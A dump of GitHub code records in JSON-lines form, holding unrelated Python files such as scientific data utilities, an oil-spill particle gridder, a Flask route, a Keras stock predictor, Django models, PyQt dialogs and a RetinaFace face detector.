self.encoding_functions],dim=-1)\n","repo_name":"davidemiro/NeRF-pytorch","sub_path":"nerf/encoding.py","file_name":"encoding.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36343146857","text":"from math import log10, floor\nimport numpy as np\nimport pprint\npp = pprint.PrettyPrinter(indent=12)\n\n# Round to 3 s.f.\ndef sf3(x):\n if x and isinstance(x, (int, float, complex)) and not isinstance(x, bool):\n return round(x, -int(floor(log10(abs(x)))) + 2)\n else:\n return x\n\ndef fieldMinMax(dataTypeDict, fieldName):\n if fieldName in dataTypeDict:\n field = dataTypeDict[fieldName]\n if type(field) == np.ndarray:\n if field.shape[0] > 1:\n # Handle 2D arrays, e.g. an array containing x, y, z in columns\n try:\n if len(field.shape) > 1:\n for dim1Idx in range(field.shape[1]):\n print(' ', \n sf3(np.min(field[:, dim1Idx])), \n ' >= ', fieldName, ' - col ', dim1Idx, \n ' >= ', sf3(np.max(field[:, dim1Idx])))\n else:\n print(' ', \n sf3(np.min(field)), \n ' >= ', fieldName,\n ' >= ', sf3(np.max(field)))\n except ValueError:\n print(' ', fieldName, ' contains data error!') \n\ndef info(containers, **kwargs):\n if not isinstance(containers, list):\n containers = [containers]\n for container in containers:\n pp.pprint(container['info'])\n for channelName in container['data']:\n print(' Channel: ' + channelName)\n for dataType in container['data'][channelName]:\n print(' DataType: ' + dataType)\n dataTypeDict = container['data'][channelName][dataType]\n if 'ts' in dataTypeDict:\n print(' Num events: ', len(dataTypeDict['ts']))\n fieldMinMax(dataTypeDict, 'ts')\n if 'tsOffset' in dataTypeDict:\n print(' Ts offset: ', dataTypeDict['tsOffset'])\n for fieldName in dataTypeDict.keys():\n if fieldName not in ['ts', 'tsOffset']:\n fieldMinMax(dataTypeDict, fieldName)\n else:\n pp.pprint(dataTypeDict)\n print()\n print()\ndef infoTs(containers, **kwargs):\n if not isinstance(containers, list):\n containers = [containers]\n for container in containers:\n print(container['info'])\n for channelName in container['data']:\n print(' Channel: ' + channelName)\n for dataType in container['data'][channelName]:\n print(' DataType: ' + dataType)\n dataTypeDict = container['data'][channelName][dataType]\n if 'ts' in dataTypeDict:\n fieldMinMax(dataTypeDict, 'ts')\n if 'tsOffset' in dataTypeDict:\n print(' Ts offset: ', dataTypeDict['tsOffset'])\n\n#%% Legacy function names\n\ndef dict_keys_print(d, indent):\n print(' ' * (4 * indent - 2) + '{ ', end='')\n first = True\n for key, value in d.items():\n if first:\n print(str(key), end='')\n first = False\n else:\n print(' ' * 4 * indent + str(key), end='')\n if isinstance(value, dict):\n print(':')\n dict_keys_print(value, indent + 1)\n else:\n print(',')\n continue\n print(' ' * (4 * indent - 2) + '}')\n\ndef infoForImportedDicts(container, **kwargs):\n info(container, **kwargs)\n\ndef infoTsForImportedDicts(container, **kwargs):\n infoTs(container, **kwargs)","repo_name":"event-driven-robotics/bimvee","sub_path":"bimvee/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"71567507368","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule: build_particle_array.py\nCreated on Sat Oct 19 15:34:52 2013\n@author: gav\nDescription:\n\n\"\"\"\n### Imports\nfrom __future__ import print_function\n\nimport os, sys\nimport time\n\nimport os.path as osp\nimport numpy as np\nimport numpy.ma as ma\nimport pickle\n\nfrom numpy import array, newaxis\nimport scipy.sparse as sp\nimport matplotlib.pyplot as plt\n\n\nfrom pyproj import Proj\nfrom shapely.geometry import Polygon\n#\n#import bonaparte\n#import bonaparte.stoch.stoch_lib as sl\n#from bonaparte.utils.grid_cell_areas import grid_cell_areas\n\n### Logging\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\ndebug, info, warn, error = logging.debug, logging.info, logging.warn, logging.error\n### Constants\n\nSOUTHERN_HEMISPHERE = True\n\nSURFACE_TYPE = 0\nAROMATIC_TYPE = -1\nENTRAINED_TYPE = -2\nSURFACTANT_TYPE = -3\n\nTR3_RECORD_SIZE = 40\nEMPTY_HEADER_LINES = 7\n\n### Classes\n\n### Functions\n\n### Grid cell area module\ndef grid_cell_areas(_grid_header=None, grid_fp=None):\n \"\"\"\n Return an array of the areas of a column of grid cells\n \"\"\"\n assert bool(_grid_header) != osp.isfile(grid_fp or \"\")\n _gh = _grid_header or grid_header(grid_fp)\n points_array = grid_column_verts(_gh)\n utm_points_array = reproject(points_array)\n area_array = polygon_areas(utm_points_array)\n return area_array\n\ndef grid_column_verts(_grid_header=None, grid_fp=None):\n \"\"\"\n Given a grid, return an array of the corners of a column of the grid\n Which column is unimportant as all will have the same set of areas.\n\n The array will have dimensions\n n_rows, that is the length of the column\n n_points, that is 5, the number to specify a rectangle\n n_geo_dims, that is 2 lat,lon\n\n eg\n [[(ax1, ay1), (ax2, ay2), (ax3, ay3), (ax4, ay4), (ax5, ay5)],\n [(bx1, by1),.. (bx5, by5)],]\n\n Fastest way to fill numpy array\n http://stackoverflow.com/questions/5891410/numpy-array-initialization-fill-with-identical-values?lq=1\n \"\"\"\n # Ensure grid_header xor grid_fp exist\n assert bool(_grid_header) != osp.isfile(grid_fp or \"\")\n _gh = _grid_header or grid_header(grid_fp)\n n_rows = _gh['n_rows']\n dy = float(_gh['lon_delta'])\n lon_0 = float(_gh['lon_lower_left'])\n lat_0 = float(_gh['lat_lower_left'])\n\n # Make me a function to generate vertices\n vertices = verts_factory(_gh)\n # Need a sequence of lower left points\n verts_array = np.empty(shape=(n_rows, 5, 2))\n ll_corners = np.empty(shape=(n_rows, 2)) # lower left corners (lon, lat)\n ll_corners[:,0] = lon_0\n ll_corners[:,1] = np.linspace(lat_0, lat_0 + n_rows * dy, n_rows)\n verts_array[:] = np.array(map(vertices, ll_corners))\n return verts_array\n\ndef polygon_areas(arr):\n \"\"\"\n Given an column of points, return a column of polygon areas\n \"\"\"\n ps = map(Polygon, arr)\n areas = [p.area for p in ps]\n return np.array(areas)\n\ndef reproject(arr, zone=None):\n \"\"\"Given an aray of points, return the utm coordinates\"\"\"\n new_arr = np.empty_like(arr)\n _zone = zone or utm_zone(None)\n proj = Proj(proj=\"utm\", zone=_zone, ellps=\"WGS84\")\n for i, grid_cell in enumerate(arr):\n for j, point in enumerate(grid_cell):\n new_arr[i, j, :] = np.array(proj(*point))\n return new_arr\n\ndef utm_zone(point):\n \"\"\"\n *** Warning stub only - fixed output\n Given a geographical point, return the appropriate utm zone\n\n Args:\n point - array of shape (1, 2) ie (lon, lat)\n\n Returns:\n zone - string of the form \"50L\"\n\n \"\"\"\n warn(\"***Warning stub function - fixed return value***\")\n return \"50L\"\n\ndef verts_factory(grid_header):\n \"\"\"\n Return a function that will calculate the five verts given the lower left corner\n \"\"\"\n dx = np.array([float(grid_header['lon_delta']), 0])\n dy = np.array([0, float(grid_header['lat_delta'])])\n\n def verts(point):\n _verts = np.empty((5,2))\n _verts[0] = point\n _verts[1] = point + dx\n _verts[2] = point + dx + dy\n _verts[3] = point + dy\n _verts[4] = point\n return _verts\n\n return verts\n\n###\n### Stoch_lib module ###\n\n\ndef gridder_arr_factory(grid_fp=None,\n grid_ext=None,\n grid_spc=None):\n \"\"\"Return a function to convert lon, lat to row, col\n\n Args of factory:\n grid_fp - String of the full path to a APASA .dep grid file\n grid_extent - a dictionary of the upper right and lower left corners\n see stoch_lib.grid_extent\n grid_spacing_arr - array of lon_delta and lat_delta\n see stoch.lib.grid_spacing\n \"\"\"\n err_msg = \"Incomplete args. see \\n {}\".format(gridder_arr_factory.__doc__)\n assert grid_fp or (grid_extent and grid_spacing), err_msg\n\n if grid_fp is not None:\n assert osp.isfile(grid_fp), \"{} is not a file\".format(grid_fp)\n if grid_ext is None:\n grid_ext = grid_extent(grid_fp)\n if grid_spc is None:\n grid_spc = grid_spacing_arr(grid_fp)\n\n origin = np.array(grid_ext['upper_left'])\n print(\"origin is {}\".format(origin))\n delta = np.array(grid_spc).view(' gen = particles_and_shore_generator(tr3_fp, lu3_fp, grid_fp)\n > for time, surf, entr, arom , shore in gen:\n > ...\n\n Yields (time, surf_p, entr_p, arom_p, shore_c)\n \"\"\"\n def log(log_msg): debug(\"particle_and_shore_generator: {}\".format(log_msg))\n if __debug__:\n log(\"TR3 file is {}\".format(tr3_fp))\n log(\"LU3 file is {}\".format(lu3_fp))\n log(\"Grid file is {}\".format(grid_fp))\n\n\n grid_record = grid_extent(grid_fp)\n lower_lon, upper_lat = grid_record['upper_left']\n upper_lon, lower_lat = grid_record['lower_right']\n\n lu3_arr = lu3_data(lu3_fp)\n particle_names_ls = ['lon', 'lat', 'radius', 'prev_lon', 'prev_lat',\n 'type', 'mass', 'density', 'viscosity', 'age']\n particle_formats_ls = [' lower_lon),\n np.array(particles['lon'] < upper_lon))\n lat_mask = np_and(np.array(particles['lat'] > lower_lat),\n np.array(particles['lat'] < upper_lat))\n bounds_mask = np_and(lon_mask, lat_mask)\n surf_p = particles[np_and(bounds_mask, surf_mask)]\n entr_p = particles[np_and(bounds_mask, entr_mask)]\n arom_p = particles[np_and(bounds_mask, arom_mask)]\n yield (row['time'], surf_p, entr_p, arom_p, shore_cells)\n\n return inner()\n\ndef main():\n \"\"\"\n Main func\n \"\"\"\n project_dir = r\"J:\\data\\j0267_nv_remodel\"\n stem = \"J0267_SC3_SBED_LEAK_TRA_001\"\n grid_fn = \"VanGogh_800m.DEP\"\n h5_fn = \"j0267_data.h5\"\n\n tr3_fp = osp.join(project_dir, \"modelout\", stem + \".tr3\" )\n lu3_fp = osp.join(project_dir, \"modelout\", stem + \".lu3\" )\n grid_fp = osp.join(project_dir, \"grids\", grid_fn)\n\n surf_threshold = 1e-6 # T/m2 or 1 g/m2\n\n header = grid_header(grid_fp)\n grid_shape = (header['n_rows'], header['n_cols'])\n\n particles = particles_and_shore_generator(tr3_fp, lu3_fp, grid_fp)\n gridder = gridder_arr_factory(grid_fp)\n\n start_time = time.time()\n max_surf_mass = np.zeros(grid_shape, dtype=np.float32)\n\n for i, tup in enumerate(particles):\n sim_time, surf, entr, arom, shore = tup\n surf_dense = grid_mass_dense(surf, gridder, grid_shape)\n max_surf_mass = np.maximum(max_surf_mass, surf_dense)\n\n # Now we need a threshold_matrix to find which cells have exceeded the threshold\n cell_areas = grid_cell_areas(grid_fp=grid_fp)\n # the mass threshold is the threshold * area eg 0.001 kg/m2 * 640000 m2 = mass in Ts\n mass_threshold_T = cell_areas * surf_threshold\n exceedance = max_surf_mass >= mass_threshold_T[:, np.newaxis]\n max_mass = ma.array(max_surf_mass, mask=(max_surf_mass == 0.0))\n elapsed_time = time.time() - start_time\n print(\"Finished {} timesteps in {} seconds\".format(i, elapsed_time))\n# plt.imshow(exceedance, origin=\"upper\", interpolation=\"nearest\")\n# plt.show()\n\n### Tests\n\nif __name__ == \"__main__\":\n\n main()\n\n\n print(\"Done __main__\")\n","repo_name":"gjcoombes/banks","sub_path":"banks/pythresh/pythresh.py","file_name":"pythresh.py","file_ext":"py","file_size_in_byte":13246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27028871218","text":"\r\nfrom asyncio import constants\r\nimport json\r\nfrom flask import Flask, redirect, url_for, request,render_template,Request,jsonify,make_response\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/biz', methods=[ 'GET'])\r\ndef business():\r\n\tif request.method == 'GET':\r\n\t\tkeyword = request.args.get('keyw')\r\n\t\tnewresp = {\r\n\t\t\t\"name\": \"John\",\r\n\t\t\t\"age\": 30,\r\n\t\t\t\"city\": \"New York\"\r\n\t\t\t}\r\n\t\tjsondata = json.dumps(newresp)\r\n\t\tprint(jsondata)\r\n\t\treturn render_template('biz.html',data = jsondata)\r\n\t\r\n\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug=True)\r\n","repo_name":"Shreyavish/bizsample","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35748524941","text":"'''\nhttps://boj.kr/9012\n'''\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\n\nfor _ in range(N):\n parentheses = input().rstrip()\n counter = 0\n for parnthesis in parentheses:\n if parnthesis == '(':\n counter += 1\n else:\n counter -= 1\n if counter < 0:\n break\n if counter == 0:\n print(\"YES\")\n else:\n print(\"NO\")\n ","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/9012_괄호.py","file_name":"9012_괄호.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26879151192","text":"def card_converter(cards):\n dictionary = {\n 'A': 14,\n 'K': 13,\n 'Q': 12,\n 'J': 11 \n }\n\n converted_cards = []\n for card in cards:\n new_card_rank = dictionary.get(card['rank']) or int(card['rank'])\n converted_cards.append({\"rank\": new_card_rank, \"suit\": card['suit']})\n\n return converted_cards","repo_name":"porlov/poker-player-always-all-in","sub_path":"card_converter.py","file_name":"card_converter.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20080103498","text":"# Day_08_01_google.py\n\nimport pandas as pd\nimport nltk\nimport numpy as np\nimport tensorflow.keras as keras\nfrom sklearn import preprocessing, model_selection\nimport matplotlib.pyplot as plt\n\n\ndef get_xy():\n goog = pd.read_csv('data/GOOG.csv', index_col=0) # Date 를 인덱스로 한다. 이때 나중에 요일 관련된 정보를 추출할 수 있음\n print(goog) # [252 rows x 6 columns]\n\n values = [goog['Open'], goog['High'], goog['Low'], goog['Volume'], goog['Close']]\n values = np.transpose(values)\n print(values.shape) # (252, 5)\n\n # ------------------------- #\n\n scaler = preprocessing.MinMaxScaler() # 원래 주식가격을 시각화에 사용하기 위해서는 minmax를 쓰지 않고 MinMaxScaler를 사용함\n values = scaler.fit_transform(values) # 공부하고 변환까지 한번에 하는 함수\n # 앞쪽이 옛날 데이터이므로 values를 뒤집지는 않는다.\n\n grams = nltk.ngrams(values, 7+1)\n grams = np.float32(list(grams)) # 튜플의 리스트라 원하는 연산을 못함. 넘파이로 바꿔줌\n\n x = np.float32([g[:-1] for g in grams]) # g는 8행 5열, 7행이어야해서 슬라이싱\n # print(x.shape) # (245, 7, 6)\n y = np.float32([g[-1, -1:] for g in grams])\n # print(y.shape) # (245, 1)\n\n return x, y, scaler.data_min_[-1], scaler.data_max_[-1]\n\n\ndef model_google():\n x, y, data_min, data_max = get_xy() # 최대 최소값을 이용, 계산해 원래의 값으로 복구시킨다\n\n data = model_selection.train_test_split(x, y, train_size=0.8, shuffle=False)\n x_train, x_test, y_train, y_test = data\n\n model = keras.Sequential()\n model.add(keras.layers.InputLayer(input_shape=x.shape[1:]))\n model.add(keras.layers.SimpleRNN(32, return_sequences=False))\n # hidden stage의 사이즈를 늘리거나 simplernn layer를 늘릴수록 정확도가 높아짐\n # return_sequences:true->입력한 값만큼,false->1개 # rnn은 x는 3차원 데이터가 들어옴. y는 2차원임\n\n model.add(keras.layers.Dense(1))\n # model.summary()\n\n model.compile(optimizer=keras.optimizers.Adam(0.001),\n loss=keras.losses.mse,\n metrics='acc') # mae는 정답과의 오차\n\n model.fit(x_train, y_train, epochs=100, verbose=2,\n validation_data=(x_test, y_test))\n print(model.evaluate(x_test, y_test, verbose=0))\n\n p = model.predict(x_test)\n\n plt.subplot(1, 2, 1)\n plt.plot(y_test, 'r', label='target') # 데이터를 섞어서 시각화가 제대로 되지 않음 # 셔플옵션 false로 주고오기\n plt.plot(p, 'g', label='prediction')\n plt.legend() # label 값을 표에 표시할수있다\n\n p = (data_max - data_min) * p + data_min\n # print((data_max-data_min)*p+data_min)\n y_test = (data_max - data_min) * y_test + data_min\n\n plt.subplot(1, 2, 2)\n plt.plot(y_test, 'r') # 데이터를 섞어서 시각화가 제대로 되지 않음 # 셔플옵션 false로 주고오기\n plt.plot(p, 'g')\n plt.ylim(2650, 3000)\n plt.show()\n\n\nmodel_google()\n\n","repo_name":"hmson18/cafe_WatingTime","sub_path":"Day_08_01_google.py","file_name":"Day_08_01_google.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14014484434","text":"from random import randint\r\nprint('='*35)\r\nprint('Eu pensei em um número de 0 a 10...')\r\nprint('='*35)\r\nnum = int(input('Em que número eu pensei? '))\r\ncomputador = randint(0,10)\r\ntentativa = 0\r\nwhile num != computador:\r\n num = int(input('\\033[31mOpção errada, tente novamente.\\033[m\\nEm que número eu pensei? '))\r\n tentativa += 1\r\nprint('Você acertou, mas precisou de {} tentativa(s).'.format(tentativa+1))","repo_name":"andreattamatheus/Jornada-Python-Cursoemvideo-Mundo2","sub_path":"Desafio #058.py","file_name":"Desafio #058.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73431678569","text":"from django.db import models\nfrom django.core.exceptions import ValidationError\n\n\n\n\nclass Operator(models.Model): \n\tfirst_name = models.CharField(max_length=10)\n\tlast_name = models.CharField(max_length=10)\n\n\n\t\n\n\tdef __str__(self):\n\t\treturn \"{} {}\".format(self.first_name, self.last_name) \n\n\n\tdef capitalize(self, word):\n\t\tif word[0].islower():\n\t\t\traise ValidationError('Please make first letter uppercase - {}'.format(word))\n\n\tdef validate_unique(self, exclude=None):\n\t\t\"\"\"\n\t\tcan also do this within Operator class \n\t\t\t# class Meta:\n\t\t\t# \tunique_together = ('first_name', 'last_name')\n\t\t\"\"\"\n\t\toperators = Operator.objects.all()\n\t\t# import pdb; pdb.set_trace()\n\t\tfor operator in operators:\n\t\t\tif operator.first_name == self.first_name and operator.last_name == self.last_name: \n\t\t\t\traise ValidationError('Combination of first & last name alreads exists in DB = {} {}'.format(operator.first_name, operator.last_name))\n\n\t\tself.capitalize(self.first_name)\n\t\tself.capitalize(self.last_name)\n\n\n\tdef save(self, *args, **kwargs): \n\t\t\"\"\"\n\t\tvalidate data before saving\n\t\t\"\"\"\n\t\tself.validate_unique()\n\t\treturn super(Operator, self).save(*args, **kwargs) \n\n\n\n\n\n\nclass Site(models.Model):\n\tlocation = models.CharField(max_length=5)\n\tcreated = models.DateTimeField(auto_now_add=True)\n\tupdated = models.DateTimeField(blank=True, null=True)\n\tdeleted = models.DateTimeField(blank=True, null=True)\n\toperator = models.ForeignKey(Operator, on_delete=models.CASCADE)\n\n\tdef __str__(self):\n\t\treturn self.location \n\n\n\nclass Computer(models.Model):\n\thostname = models.CharField(max_length=10, unique=True)\n\tbfid = models.CharField(max_length=20, unique=True)\n\tsite = models.ForeignKey(Site, on_delete=models.CASCADE)\n\tcreated = models.DateTimeField(auto_now_add=True)\n\tupdated = models.DateTimeField(blank=True, null=True)\n\tdeleted = models.DateTimeField(blank=True, null=True)\n\n\tdef __str__(self):\n\t\treturn self.hostname\n\n\n\n\n\n","repo_name":"FelicianoAnthony/filter-by-param","sub_path":"myapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21487740511","text":"class Solution(object):\n def distnict(self, nums, k):\n dict = defaultdict(int)\n left = 0\n right = 0\n res = 0\n while right < len(nums):\n dict[nums[right]] += 1\n while len(dict) > k:\n dict[nums[left]] -= 1\n if dict[nums[left]] == 0:\n del dict[nums[left]]\n left += 1\n res += right - left + 1\n right += 1\n return res\n def subarraysWithKDistinct(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n return self.distnict(nums, k) - self.distnict(nums, k - 1)\n","repo_name":"bontu-fufa/squid-game","sub_path":"subarraysWithKDistinct.py","file_name":"subarraysWithKDistinct.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36151732061","text":"import sys\nsys.path.append(\"..\")\nfrom naive_bayes import NaiveBayes\nfrom testing import loadData, splitData, extractColumn, getAccuracy\n\ndata = loadData('iris.data')\n\ntrainSet, testSet = splitData(data, 0.66)\n\ntrainY, trainX = extractColumn(trainSet, 'class')\ntestY, testX = extractColumn(testSet, 'class')\n\npredictions = NaiveBayes().fit(trainX, trainY).predict(testX)\n\naccuracy = getAccuracy(testY, predictions)\nprint('Accuracy: ' + repr(accuracy) + '%')","repo_name":"dan-silver/machine-learning-algorithms","sub_path":"examples/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33712972825","text":"import sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\n\nclass MyWindow(QMainWindow):\n def __init__(self, parent=None):\n super(MyWindow, self).__init__(parent)\n self.setWindowTitle(\"弹出式对话框例子\")\n self.resize(400, 200)\n self.btn1 = QPushButton(self)\n self.btn1.setText(\"消息框\")\n self.btn1.clicked.connect(self.msg1)\n layout = QVBoxLayout()\n\n self.btn2 = QPushButton(self)\n self.btn2.setText(\"问答对话框\")\n self.btn2.clicked.connect(self.msg2)\n\n self.btn3 = QPushButton()\n self.btn3.setText(\"警告对话框\")\n self.btn3.clicked.connect(self.msg3)\n\n self.btn4 = QPushButton()\n self.btn4.setText(\"严重错误对话框\")\n self.btn4.clicked.connect(self.msg4)\n\n self.btn5 = QPushButton()\n self.btn5.setText(\"关于对话框\")\n self.btn5.clicked.connect(self.msg5)\n\n layout.addWidget(self.btn1)\n layout.addWidget(self.btn2)\n layout.addWidget(self.btn3)\n layout.addWidget(self.btn4)\n layout.addWidget(self.btn5)\n\n self.setLayout(layout)\n\n def msg1(self):\n # 使用infomation信息框\n relay = QMessageBox.information(self, \"车辆总数\", \"100\", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n print(relay)\n\n def msg2(self):\n relay = QMessageBox.question(self, \"标题\", \"问答消息正文\", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n print(relay)\n\n def msg3(self):\n QMessageBox.warning(self, \"标题\", \"警告消息正文\", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n\n def msg4(self):\n QMessageBox.critical(self, \"标题\", \"严重错误消息正文\", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n\n def msg5(self):\n QMessageBox.about(self, \"标题\", \"关于消息正文\")\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = MyWindow()\n win.show()\n sys.exit(app.exec_())\n","repo_name":"huang443765159/kai","sub_path":"pyqt弹窗/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"33421484352","text":"col_types = {'insurance_company_name': 'String?',\n 'account_date': 'String?',\n 'claim_id': 'String?',\n 'order_id': 'String?',\n 'event_dt': 'String?',\n 'client_contact_dt': 'String?',\n 'all_documents_dt': 'String?',\n 'payment_or_refusal_dt': 'String?',\n 'client_fio': 'String?',\n 'victim_role': 'String?',\n 'phone_number': 'String?',\n 'comment': 'String?',\n 'risk_name': 'String?',\n 'payment_table_point': 'String?',\n 'ocr_rub': 'Double?',\n 'payment_rub': 'Double?',\n 'sent_to_payment_dt': 'String?',\n 'status': 'String?',\n 'refusal_of_compensation': 'Int64?'\n }\n\ncol_types.pop('sent_to_payment_dt')\n\nprint(col_types)","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/GENERAL/testing (26).py","file_name":"testing (26).py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1567002070","text":"#YouTube tutorial \"Python 3 Programming Tutorial\"\n\nimport csv\n\nwith open('example.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n print(readCSV)\n \n dates = []\n colors = []\n \n for column in readCSV:\n color = column[2]\n date = column[1]\n \n dates.append(date)\n colors.append(color)\n \n print(dates)\n print(colors)\n \n \n \n \n \n ","repo_name":"shmohamud/funwpython","sub_path":"opencsvtest.py","file_name":"opencsvtest.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6768977801","text":"\ndef userInput(): \n while True:\n try:\n income = round(float(input(\"Please provide monthly income: \")))\n return income\n except ValueError:\n print(\"Please enter a valid income\")\n \ndef calcTax(income):\n totalTax = 0\n firstBracket = 0\n secondBracket = 0\n thirdBracket = 0\n if income < 38000:\n totalTax = income * 0.3\n elif income >= 38000 and income < 50000:\n firstBracket = 38000 * 0.3\n secondBracket = (income - 38000) * 0.35\n totalTax = firstBracket + secondBracket\n else:\n firstBracket = 38000 * 0.3\n secondBracket = (50000 - 38000) * 0.35\n thirdBracket = (income - 50000) * 0.4\n totalTax = firstBracket + secondBracket + thirdBracket\n\n return totalTax\n\ndef main():\n income = userInput()\n tax = int(calcTax(income))\n\n print(f\"Corresponding income tax: {tax}\")\n\nif __name__ == \"__main__\":\n main()\n\n\n ","repo_name":"PhilipV1/PythonAssignment1","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24776564105","text":"import colorsys\nimport os\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom PIL import Image, ImageDraw, ImageFont\nfrom torch.autograd import Variable\n\nfrom nets.retinaface import RetinaFace\nfrom utils.anchors import Anchors\nfrom utils.box_utils import (decode, decode_landm, letterbox_image,\n non_max_suppression, retinaface_correct_boxes)\nfrom utils.config import cfg_mnet, cfg_re50\n\n\ndef preprocess_input(image):\n image -= np.array((104, 117, 123),np.float32)\n return image\n\n\nclass Retinaface(object):\n _defaults = {\n \"model_path\" : 'logs/Epoch113-Total_Loss5.4983.pth',\n \"backbone\" : 'mobilenet',\n \"confidence\" : 0.5,\n \"nms_iou\" : 0.45,\n \"cuda\" : True,\n\n \"input_shape\" : [1280, 1280, 3],\n \"letterbox_image\" : True\n }\n\n @classmethod\n def get_defaults(cls, n):\n if n in cls._defaults:\n return cls._defaults[n]\n else:\n return \"Unrecognized attribute name '\" + n + \"'\"\n\n\n def __init__(self, **kwargs):\n self.__dict__.update(self._defaults)\n if self.backbone == \"mobilenet\":\n self.cfg = cfg_mnet\n else:\n self.cfg = cfg_re50\n self.generate()\n if self.letterbox_image:\n self.anchors = Anchors(self.cfg, image_size=[self.input_shape[0], self.input_shape[1]]).get_anchors()\n\n #---------------------------------------------------#\n # load the model\n #---------------------------------------------------#\n def generate(self):\n self.net = RetinaFace(cfg=self.cfg, mode='eval').eval()\n\n #-------------------------------#\n # load model and weight\n #-------------------------------#\n print('Loading weights into state dict...')\n state_dict = torch.load(self.model_path)\n self.net.load_state_dict(state_dict)\n if self.cuda:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0,1'\n self.net = nn.DataParallel(self.net)\n self.net = self.net.cuda()\n print('Finished!')\n\n #---------------------------------------------------#\n # detect images\n #---------------------------------------------------#\n def detect_image(self, image):\n\n old_image = image.copy()\n\n image = np.array(image,np.float32)\n\n #---------------------------------------------------#\n # calculate scale to predect the orginal picture weight and height\n #---------------------------------------------------#\n scale = [np.shape(image)[1], np.shape(image)[0], np.shape(image)[1], np.shape(image)[0]]\n scale_for_landmarks = [np.shape(image)[1], np.shape(image)[0], np.shape(image)[1], np.shape(image)[0],\n np.shape(image)[1], np.shape(image)[0], np.shape(image)[1], np.shape(image)[0],\n np.shape(image)[1], np.shape(image)[0]]\n\n im_height, im_width, _ = np.shape(image)\n\n\n if self.letterbox_image:\n image = np.array(letterbox_image(image, [self.input_shape[1], self.input_shape[0]]), np.float32)\n else:\n self.anchors = Anchors(self.cfg, image_size=(im_height, im_width)).get_anchors()\n \n with torch.no_grad():\n #-----------------------------------------------------------#\n # normalization\n #-----------------------------------------------------------#\n image = torch.from_numpy(preprocess_input(image).transpose(2, 0, 1)).unsqueeze(0)\n\n if self.cuda:\n self.anchors = self.anchors.cuda()\n image = image.cuda()\n\n loc, conf, landms = self.net(image)\n \n #-----------------------------------------------------------#\n # decode for predicted result\n #-----------------------------------------------------------#\n boxes = decode(loc.data.squeeze(0), self.anchors, self.cfg['variance'])\n boxes = boxes.cpu().numpy()\n\n conf = conf.data.squeeze(0)[:,1:2].cpu().numpy()\n \n landms = decode_landm(landms.data.squeeze(0), self.anchors, self.cfg['variance'])\n landms = landms.cpu().numpy()\n\n boxes_conf_landms = np.concatenate([boxes, conf, landms],-1)\n boxes_conf_landms = non_max_suppression(boxes_conf_landms, self.confidence)\n if len(boxes_conf_landms)<=0:\n return old_image\n\n if self.letterbox_image:\n boxes_conf_landms = retinaface_correct_boxes(boxes_conf_landms, \\\n np.array([self.input_shape[0], self.input_shape[1]]), np.array([im_height, im_width]))\n \n boxes_conf_landms[:,:4] = boxes_conf_landms[:,:4]*scale\n boxes_conf_landms[:,5:] = boxes_conf_landms[:,5:]*scale_for_landmarks\n\n for b in boxes_conf_landms:\n text = \"{:.4f}\".format(b[4])\n b = list(map(int, b))\n\n # b[0]-b[3] are the cordinate of facial box,b[4] is the score\n cv2.rectangle(old_image, (b[0], b[1]), (b[2], b[3]), (0, 0, 255), 2)\n cx = 